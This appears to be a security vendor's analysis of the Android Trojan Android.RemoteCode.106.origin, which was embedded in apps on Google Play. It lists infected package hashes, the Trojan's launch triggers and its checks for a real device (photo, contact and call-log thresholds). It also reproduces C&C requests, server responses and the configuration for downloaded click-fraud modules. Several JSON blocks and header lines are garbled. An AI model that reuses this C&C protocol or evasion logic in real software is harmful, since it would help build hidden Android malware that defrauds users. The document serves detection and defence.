| SHA1: | Application package name | Application version with the Trojan |
|---|---|---|
| 0e5e5cfbeb05fe27f59c8aa15bfca3556cbe7005 | com.alkalinelabs.bandgame | 1.47 |
| 29bbbcdbc888a7ff7e7bfaa96b3815a604b903fc | com.gamehero.sweetbakerymatch3saga | 3.0 |
| 287aea9ca36ace404372f98e222ab2d509e49019 | com.gamehero.cartoonracoon | 1.0.2 |
| 1cd9537c376d139f91b3628e01c7d0e2079ba2e5 | com.antee.biblicalquiz | 1.8 |
| 3f50c348c94a53164d0bd241773c9b90aee3a85f | en.biblequiz.pro | 2.4 |
| c916a6fa36b76bd0af8b0a181d3f349fd086c19d | com.justfclean.fustc | 1.0 |
| d88f7805a619f108b55921269e94c31fbdf1d4f5 | com.getrewarded | 1.9 |
| 8f9587da8dac4befc9617817ded31297a70e9328 | com.alkalinelabs.learntosing | 1.2 |
| 78dec5a8ff19c27211542ee7a251c3fb6f44df4a | com.mdroidapps.easybackup | v.4.9.15 |
An Android Trojan which can be embedded into benign applications. Several programs with Android.RemoteCode.106.origin were detected on Google Play.
The Trojan starts automatically in the following cases:
- Boot of an infected mobile device (tracks a system event android.intent.action.BOOT_COMPLETED);
- Obtaining of an intent MOBGUN_REPORT_INTENT, which is sent every 30 seconds using the class AlarmManager. In case of devices with Android 5.0 and its later versions, launch is performed every 30 seconds using JobScheduler;
- Start of the application containing Android.RemoteCode.106.origin.
Android.RemoteCode.106.origin does not act if an infected device lacks a specific number of photos, contacts and phone calls in the call log. For example, for the Trojan version of the application Bible Trivia v1.8 (sha1: 1cd9537c376d139f91b3628e01c7d0e2079ba2e), a device must have:
- At least 10 photos;
- At least 3 entries in the phone log for the last three days;
- At least 10 contacts with phone number.
If upon the check the indicated conditions are satisfied, Android.RemoteCode.106.origin sends the following request to the command and control server:
GET http://mobgun*********.com:443/sys/k/get/?pn=com.antee.biblicalquiz&sub=test_sub_id&pub=90154&aid=99d078094e1be3b9&av
HTTP/1.1 =16&v=11&b=Z2VuZXJpYw==&m=c2Rr
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.1.2; sdk Build/MASTER)
Host: :443 mobgun*********.com
Connection: Keep-Alive
Accept-Encoding: gzip
As a response, it gets a command with a list of web addresses to follow:
{
"result":true,
"k":[
{
"t":1,
"u":" " http://download********.top/click.php?cnv_id=[CLICK_ID]&payout=0.01
},
{
"t":2,
"u":" " http://download********.top/click.php?cnv_id=[CLICK_ID]&cnv_status=[TIME]&payout=0.01
},
{
{
"t":0,
"u":" }" http://download********.top/click.php?key=du7ww2dgf7uje503rvmd&pubid={pubid
}
]
}
After that, the Trojan attempts to follow the received links. If it successfully follows them and gets a response, Android.RemoteCode.106.origin performs its main malicious functions.
The Trojan sends to the server http://mobgun*********.com/sys/m/g/ the following request:
{
"v":11,
"ref":"02e1f7vtlfnbzac1",
"model":"sdk",
"pubId":"90154",
"subId":"test_sub_id",
"brand":"generic",
"pn":"com.antee.biblicalquiz",
"m":[
],
"aid":"99d078094e1be3b9",
"av":16
}
As a response, it receives a command with a list of additional modules (x.awvw.Awvw – Android.Click.199.origin, x.wpp.Wpp – Android.Click.200.origin) and a configuration file that must be downloaded from the server:
{
"result":true,
"m":[
{
"t":1,
"n":"x.awvw.Awvw",
"h":"b42c215188486c7ed65341d2fdefda3b",
"u":"/sys/m/l/5b3f1818-f0f5-49c4-b77f-7f455027bd14/"
},
{
"t":1,
"n":"x.wpp.Wpp",
"h":"ce77c3c4b33b0d078afdec6fbfc21093",
"u":"/sys/m/l/9d2dc3fd-abf1-4c61-80e6-2b5a8b3f77f7/"
},
{
"t":3,
"n":"config",
"h":"25507ab4013f1deafebf14487cebcb61",
"u":"/sys/m/l/e2a018b0-c3d5-40a6-ae44-4ef7bec205c3/"
}
],
"time":1510217665299
}
The configuration file of the Trojan looks the following way:
{
"debug":true,
"debugList":[
"76e5379d356d8156",
"644e08515fb7ab5",
"c6f19b3e796ea3fb",
"76e5379d356d8156",
"e946a5959a48945b"
],
"awvw":true,
"awvwUrl":"http://*.*.65.235:18011/sys/action/?t={TYPE}&pn={PACKAGENAME}&aid={ANDROIDID}&av={APIVERSION}&brand={B
}" RAND}&model={MODEL}&msg={MSG}&tid={TID}&sv={SOFTVERSION ,
"awvwTaskUrl":" " http://*.*.65.235:18080/sys/task/get/ ,
"awvwPingUrl":" " http://*.*.65.235:18011/sys/ping/ ,
"awvwMaxWorkers":3,
"awvwMaxAttempts":5,
"awvwAttemptDelay":30000,
"awvwDebug":false,
"awvwVisible":false,
"awvwVisible":false,
"awvwTouchable":false,
"glPingDelay":900000,
"awvwRefreshDelay":60000,
"awvwMaxNoRefresh":600000,
"awvwCookieDelay":30000,
"awvwPageFinishTime":15000,
"awvwClickTimeout":15000
}
The link to the loaded modules is generated the following way: host name http://mobgun*********.com + string u from the response received from the server.
- http://mobgun*********.com/sys/m/l/9d2dc3fd-abf1-4c61-80e6-2b5a8b3f77f7/ – for Android.Click.200.origin.
- http://mobgun*********.com/sys/m/l/5b3f1818-f0f5-49c4-b77f-7f455027bd14/ – for Android.Click.199.origin.
The downloaded malicious components are JAR files that are launched using the DexClassLoader class after being downloaded.
